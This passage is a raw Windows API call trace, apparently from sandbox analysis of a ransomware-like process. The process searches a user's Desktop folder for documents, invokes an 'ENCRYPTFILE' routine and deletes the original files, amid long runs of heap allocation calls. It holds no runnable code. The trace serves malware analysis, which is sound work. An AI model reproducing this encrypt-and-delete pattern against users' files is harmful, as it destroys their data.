lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp", lpFilePart=0x0) returned 0x3b [0130.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\b029yg4ltntgmmqx_g.odp")) returned 0x20 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0130.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0130.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6effd0b0, ftCreationTime.dwHighDateTime=0x1d5ecf1, ftLastAccessTime.dwLowDateTime=0xc3171260, ftLastAccessTime.dwHighDateTime=0x1d5f040, ftLastWriteTime.dwLowDateTime=0xc3171260, ftLastWriteTime.dwHighDateTime=0x1d5f040, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="b029yG4LTNtgmmqX_G.odp", cAlternateFileName="B029YG~1.ODP")) returned 0x41ac140 [0130.906] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\b029yg4ltntgmmqx_g.odp")) returned 1 [0131.211] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6effd0b0, ftCreationTime.dwHighDateTime=0x1d5ecf1, ftLastAccessTime.dwLowDateTime=0xc3171260, ftLastAccessTime.dwHighDateTime=0x1d5f040, ftLastWriteTime.dwLowDateTime=0xc3171260, ftLastWriteTime.dwHighDateTime=0x1d5f040, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="b029yG4LTNtgmmqX_G.odp", cAlternateFileName="B029YG~1.ODP")) returned 0 [0131.211] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0131.295] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0131.295] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0131.295] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0131.295] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0131.295] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0131.295] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.295] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.295] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.295] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0131.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.295] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x43152e0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0131.296] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0131.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0131.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0131.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0131.297] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fe0ce0, ftCreationTime.dwHighDateTime=0x1d5e9f9, ftLastAccessTime.dwLowDateTime=0x1c3d5830, ftLastAccessTime.dwHighDateTime=0x1d5f006, ftLastWriteTime.dwLowDateTime=0x1c3d5830, ftLastWriteTime.dwHighDateTime=0x1d5f006, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x0, dwReserved1=0x8, cFileName="D-AgzySFKdtUp0Q.doc", cAlternateFileName="D-AGZY~1.DOC")) returned 0x41ac280 [0131.297] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0131.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0131.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0131.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392068 [0131.298] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0131.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392068 | out: hHeap=0x1780000) returned 1 [0131.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0131.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0131.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0131.298] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0131.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0131.299] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0131.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0131.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0131.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0131.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0131.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0131.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0131.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0131.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0131.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0131.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925a8 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0131.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0131.301] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0131.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0131.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0131.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0131.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0131.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 